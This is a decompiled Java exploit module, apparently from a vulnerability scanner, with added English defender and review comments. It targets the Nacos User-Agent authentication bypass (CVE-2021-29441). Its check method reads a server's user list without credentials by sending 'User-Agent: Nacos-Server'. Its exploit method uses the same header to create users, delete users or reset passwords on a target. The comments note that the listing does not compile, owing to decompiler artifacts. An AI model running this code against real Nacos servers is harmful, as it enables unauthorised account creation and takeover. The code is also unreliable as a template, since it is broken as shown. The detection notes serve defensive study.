package com.alibaba.nacos.exploit;

import ch.qos.logback.core.joran.util.beans.BeanUtil;
import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import com.alibaba.nacos.httpclient.MyHttpResponse;
import com.github.kevinsawicki.http.HttpRequest;
import java.util.HashMap;
import org.apache.tomcat.util.http.fileupload.FileUploadBase;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_unauthorized_access.class */
/**
 * Decompiled scanner module for the Nacos User-Agent authentication bypass (CVE-2021-29441).
 *
 * <p>Per the description string returned by {@link #getInfo()}, an affected Nacos server skips
 * authentication for any request whose User-Agent is "Nacos-Server". The value was meant for
 * server-to-server calls but is hard-coded, so any client can send it. The affected range stated
 * in this file is "Nacos &lt;= 2.0.0-ALPHA.1" and the stated remediation is to upgrade.
 *
 * <p>Defender notes:
 * <ul>
 *   <li>Both {@link #check} and {@link #exploit} send "User-Agent: Nacos-Server" to
 *       {@code /v1/auth/users}. Requests with that header and path from hosts that are not
 *       cluster members are the signature to look for in access logs.</li>
 *   <li>{@link #exploit} changes state on the target (user create / delete / password update),
 *       so unexpected rows in the Nacos user table are a second indicator.</li>
 *   <li>Besides upgrading, upstream Nacos exposes {@code nacos.core.auth.enable.userAgentAuthWhite}
 *       and {@code nacos.core.auth.server.identity.key} / {@code .value} to replace the
 *       User-Agent allow-list. NOTE(review): confirm availability for the deployed version.</li>
 * </ul>
 *
 * <p>NOTE(review): this is decompiler output and is not valid Java as listed (see the
 * {@code boolean z = -1} / duplicate {@code case true} artifacts in {@link #exploit}). Constants
 * such as {@code BeanUtil.PREFIX_ADDER}, {@code FileUploadBase.CONTENT_TYPE} and
 * {@code HttpRequest.METHOD_*} appear to be string literals that the decompiler mapped onto
 * unrelated library constants with the same value.
 */
public class Alibaba_Nacos_unauthorized_access implements Vulnerability {
    // Display name, in English: "Nacos User-Agent authorization bypass (CVE-2021-29441)".
    // The methods below repeat the literal instead of reading this field.
    final String VulName = "Nacos User-Agent权限绕过（CVE-2021-29441）";

    /**
     * Returns a fixed, human-readable description of the issue.
     *
     * <p>The format string labels are, in order: vulnerability name, description, affected
     * versions, remediation, reference links. The values passed are the CVE display name, the
     * root-cause description (User-Agent "Nacos-Server" skips authentication; hard-coded value
     * intended for server-to-server requests), "Nacos &lt;= 2.0.0-ALPHA.1", "upgrade to the
     * latest version", and "none" for references.
     *
     * @return the formatted description text
     */
    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        // Result is discarded; presumably decompiler residue of reading the constant field VulName.
        getClass();
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n参考链接: %s\n\n", "Nacos User-Agent权限绕过（CVE-2021-29441）", "该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为”Nacos-Server”，如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。", "Nacos <= 2.0.0-ALPHA.1", "升级到最新版本", "无");
    }

    /**
     * Probes a target by requesting the user listing with the "Nacos-Server" User-Agent.
     *
     * <p>Sends one GET to {@code <str>/v1/auth/users?pageNo=1&pageSize=9} (a single trailing
     * slash on {@code str} is removed first) and reports a positive when the response body
     * contains the substring "pageItems".
     *
     * <p>NOTE(review): no control request without the header is sent, so a positive only shows
     * that the user list was readable without credentials, not that the User-Agent was the
     * reason (for example, authentication may simply be disabled on the target). The substring
     * match is also loose. Confirm a positive before reporting it.
     *
     * <p>NOTE(review): on a positive the full response body, i.e. the user listing, is stored in
     * the result. Treat stored results as sensitive; the listing presumably includes credential
     * material. Verify against an actual response.
     *
     * @param str base URL of the target, with or without a trailing slash
     * @return an {@code ExecutionResult} whose first argument is true on a match and false
     *     otherwise; every exception raised inside the try block (including a null {@code str})
     *     is also reported as false, so "not vulnerable" and "request failed" look the same
     * @throws Exception declared by the interface; nothing inside the try block propagates
     */
    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        // Raw HashMap as emitted by the decompiler; holds the request headers.
        HashMap hashMap = new HashMap();
        // The header value that the affected server treats as a trusted peer.
        hashMap.put("User-Agent", "Nacos-Server");
        try {
            // Third argument is null here and split[0] in exploit(), presumably the request body.
            // The meaning of the trailing boolean is not visible in this file.
            MyHttpResponse sendRequest = myHttpRequests.sendRequest((str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users?pageNo=1&pageSize=9", "GET", null, hashMap, true);
            if (sendRequest.getResponseBody().contains("pageItems")) {
                getClass();
                return new ExecutionResult(true, "Nacos User-Agent权限绕过（CVE-2021-29441）", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        } catch (Exception e) {
            // The exception is dropped: no logging, and the result carries no cause.
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        }
    }

    /**
     * Performs a state-changing user operation on the target with the "Nacos-Server" User-Agent.
     *
     * <p>{@code strArr[0]} is split on single spaces: {@code split[0]} is passed as the third
     * argument of {@code sendRequest} (presumably the form-encoded body, given the Content-Type
     * header set below) and {@code split[1]} selects the action. Three actions are recognised,
     * matched by hash code and then by {@code equals}: the value of
     * {@code BeanUtil.PREFIX_ADDER} (hash 96417, which is the hash of "add"), "del" and "reset".
     * Any other action falls through to the negative result.
     *
     * <p>Success is decided by substring matches on the response body. The add branch also
     * accepts "already exist!" and the reset branch also accepts "not exist!;", so a reported
     * success does not always mean the target's state changed.
     *
     * <p>Detection: each branch sends a request to {@code <str>/v1/auth/users} with
     * "User-Agent: Nacos-Server"; the success paths correspond to server messages
     * "create user ok!", "delete user ok!" and "update user ok!".
     *
     * @param str base URL of the target, with or without a trailing slash
     * @param strArr {@code strArr[0]} must have the form {@code "<body> <action>"}
     * @return an {@code ExecutionResult} with a true first argument and the response body on a
     *     matched success string, otherwise a false one; exceptions inside the try block are
     *     reported as false
     * @throws Exception the argument parsing on the first two lines is outside the try block, so
     *     an empty {@code strArr} or a value without a space raises an index exception to the
     *     caller
     */
    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        // Not guarded: runs before the try block.
        String[] split = strArr[0].split(" ");
        String str2 = split[1];
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        HashMap hashMap = new HashMap();
        hashMap.put("User-Agent", "Nacos-Server");
        // FileUploadBase.CONTENT_TYPE is presumably the Content-Type header name (decompiler substitution).
        hashMap.put(FileUploadBase.CONTENT_TYPE, "application/x-www-form-urlencoded");
        try {
            String str3 = (str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/auth/users";
            // Decompiler artifact: z is really an int branch index (-1 none, 0 add, 1 del, 2 reset)
            // from a compiled switch-on-String; it was mistyped as boolean, so this does not compile.
            boolean z = -1;
            switch (str2.hashCode()) {
                case 96417:
                    if (str2.equals(BeanUtil.PREFIX_ADDER)) {
                        z = false;
                        break;
                    }
                    break;
                case 99339:
                    if (str2.equals("del")) {
                        z = true;
                        break;
                    }
                    break;
                case 108404047:
                    if (str2.equals("reset")) {
                        z = 2;
                        break;
                    }
                    break;
            }
            // The labels below stand for indices 0, 1 and 2; the duplicated "case true" is the
            // decompiler rendering of index 2.
            switch (z) {
                case false:
                    // Add branch. Success message in English: "user created successfully".
                    MyHttpResponse sendRequest = myHttpRequests.sendRequest(str3, "GET", split[0], hashMap, true);
                    if (sendRequest.getResponseBody().contains("create user ok!") || sendRequest.getResponseBody().contains("already exist!")) {
                        return new ExecutionResult(true, "新增用户成功", sendRequest.getResponseBody(), null);
                    }
                    break;
                case true:
                    // Delete branch. Success message in English: "user deleted successfully".
                    MyHttpResponse sendRequest2 = myHttpRequests.sendRequest(str3, HttpRequest.METHOD_DELETE, split[0], hashMap, true);
                    if (sendRequest2.getResponseBody().contains("delete user ok!")) {
                        return new ExecutionResult(true, "删除用户成功", sendRequest2.getResponseBody(), null);
                    }
                    break;
                case true:
                    // Reset branch. Success message in English: "password reset successfully".
                    MyHttpResponse sendRequest3 = myHttpRequests.sendRequest(str3, HttpRequest.METHOD_PUT, split[0], hashMap, true);
                    if (sendRequest3.getResponseBody().contains("update user ok!") || sendRequest3.getResponseBody().contains("not exist!;")) {
                        return new ExecutionResult(true, "重置密码成功", sendRequest3.getResponseBody(), null);
                    }
                    break;
            }
            // Unknown action, or no success string matched.
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        } catch (Exception e) {
            // The exception is dropped, so a failed request cannot be told apart from a rejection.
            getClass();
            return new ExecutionResult(false, "Nacos User-Agent权限绕过（CVE-2021-29441）", null, null);
        }
    }
}
